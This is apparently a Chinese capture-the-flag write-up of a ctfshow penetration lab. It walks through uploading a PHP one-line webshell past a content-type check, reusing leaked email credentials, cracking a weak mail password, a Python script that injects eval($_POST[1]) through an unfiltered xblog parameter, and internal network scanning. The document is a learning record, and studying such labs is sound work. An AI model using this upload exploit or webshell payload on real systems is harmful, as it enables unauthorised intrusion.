一、匿名聊天室
匹配聊天后左下角有上传文件功能。
![](https://i-blog.csdnimg.cn/blog_migrate/45049cb29fcc0699ba52f88861648cd8.png)
经测试是content-type检测,修改内容为一句话木马即可,文件被重命名但是不知道上传路径在哪。
![](https://i-blog.csdnimg.cn/blog_migrate/47ac80bebd68e0776f6848aabbaf64cc.png)
![](https://i-blog.csdnimg.cn/blog_migrate/b025b3f3fdd7b18ee652c55c2dff0b12.png)
点击首页的“查看帮助”,在GitHub中找到了源码。
![](https://i-blog.csdnimg.cn/blog_migrate/f4936ae5dd83502010cb4783096af362.png)
![](https://i-blog.csdnimg.cn/blog_migrate/1ca13f1b4de4aac1e060be0c5747c0d8.png)
![](https://i-blog.csdnimg.cn/blog_migrate/c983e9e524a2f6b05b876b33bc379840.png)
对photo_upload.php进行审计,发现了上传路径为/images/photo/,把开始上传的一句话木马加上路径访问。
![](https://i-blog.csdnimg.cn/blog_migrate/b25e3e5b72ae59be8a1965dd628dcc36.png)
使用蚁剑成功连接,拿下第一台机器。
![](https://i-blog.csdnimg.cn/blog_migrate/e0f6e80f8e78394db35ddc41ef709f93.png)
找到用户密码数据hacker_ctfshow@163.com/Hacker_ctfsh0w,以为是admin.php的账户密码,进入后台管理发现用处不大。
![](https://i-blog.csdnimg.cn/blog_migrate/8d1ed9e2c81b476d9c52365893c3e6b8.png)
![](https://i-blog.csdnimg.cn/blog_migrate/b7f7f759fd879b18db163c0a22c1a781.png)
二、163邮箱
仔细观察可能是邮箱账号,尝试登录163邮箱成功,并有一封加密邮件。
![](https://i-blog.csdnimg.cn/blog_migrate/b79e9b0cd055bfae95d21c987d9598b9.png)
![](https://i-blog.csdnimg.cn/blog_migrate/a48feb07cb7abd0365fe8f577f20a2d7.png)
通过弱口令123456破解邮件成功。
![](https://i-blog.csdnimg.cn/blog_migrate/a44dd6f136733d73de6007893d10559f.png)
三、xblog开发
进入开发地址,是xblog源码。
![](https://i-blog.csdnimg.cn/blog_migrate/6f532600c4ab835cae62e754464c1cf2.png)
审计源码,在c/t.php中,没有对$d进行过滤,存在上传漏洞。(这里自己审计不出来,感谢wp)
![](https://i-blog.csdnimg.cn/blog_migrate/cf06a4a5b8573de1ca63da00601192b8.png)
先登录https://blog.ctfer.com/a/获取cookie。
![](https://i-blog.csdnimg.cn/blog_migrate/e47ef5f187b4bd67a1a12bb199f40444.png)
运行python脚本传入参数,得到文件名0.php,木马地址为p/0.php(这里python基础不好,代码为wp中的内容)
import requests
url = "https://blog.ctfer.com/c/t.php"
cookie={
"PHPSESSID":"c43f3fb2ac045580e50a7f5b696c87fa"
}
data={
"dat":'";eval($_POST[1]);?>',
"title":"1",
"content":"%20",
}
response = requests.post(url=url+"?type=submit",data=data,cookies=cookie)
print(response.text)
![](https://i-blog.csdnimg.cn/blog_migrate/34cfa418d511e3c2a6a9f6a965974bf0.png)
使用蚁剑连接,拿下第二台机器。
![](https://i-blog.csdnimg.cn/blog_migrate/d942ffec784215e05b789a09ca8a78f5.png)
四、内网探测
查看网卡信息IP为192.168.102.3,并上传ping脚本探测是否有内网存活主机。
![](https://i-blog.csdnimg.cn/blog_migrate/035d2efdde364d90a92a7fd239a6f29f.png)
![](https://i-blog.csdnimg.cn/blog_migrate/82ab06d9d59422fc4b70058abd2d5df0.png)
发现内网存活主机192.168.102.2
![](https://i-blog.csdnimg.cn/blog_migrate/f5fa7c24d33ab8d65b701d3005cff49b.png)
探测开放端口,发现8090开放
![](https://i-blog.csdnimg.cn/blog_migrate/a6c541ab718ef1c1ffa9315dad1a4184.png)
后续内网的横向渗透因为个人能力不足且没有vps就做不下去了,可以参考官方wp:https://ctf-show.feishu.cn/docx/RO1ydCc3Ko33tjxkGiNcTkM6n9b?share_token=150bb8d8-757f-4bbe-bf8d-029cee388dfc
总结:
自己还是太菜了,后面的代码审计和python脚本的编写基本都得看wp才能做下去,以及后续fastjson漏洞实现rce因为不了解Java无法复现。也让我知道了自己还有很长的路要走,得把代码审计和python这两个短板先补上。最后感谢群主搭建这个平台,让我这种刚学ctf的小白哪怕后面自己做不下去了也能参与进来!